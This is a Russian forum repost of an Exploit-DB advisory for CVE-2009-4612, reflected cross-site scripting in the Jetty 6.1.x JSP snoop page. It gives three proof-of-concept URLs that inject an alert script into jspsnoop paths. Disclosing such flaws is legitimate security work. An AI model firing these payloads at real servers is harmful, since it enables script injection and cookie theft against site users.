Exploit Jetty 6.1.x - JSP Snoop Page Multiple Cross-Site Scripting Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
33564
Проверка EDB
  1. Пройдено
Автор
ASCII
Тип уязвимости
WEBAPPS
Платформа
JSP
CVE
cve-2009-4612
Дата публикации
2009-10-24
Код:
source: https://www.securityfocus.com/bid/37927/info

Jetty is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/jspsnoop/ERROR/%3Cscript%3Ealert(123)%3C/script%3E
http://www.example.com/jspsnoop/IOException/%3Cscript%3Ealert(123)%3C/script%3E
http://www.example.com/jspsnoop/%3Cscript%3Ealert(123)%3C/script%3E
 
Источник
www.exploit-db.com

Похожие темы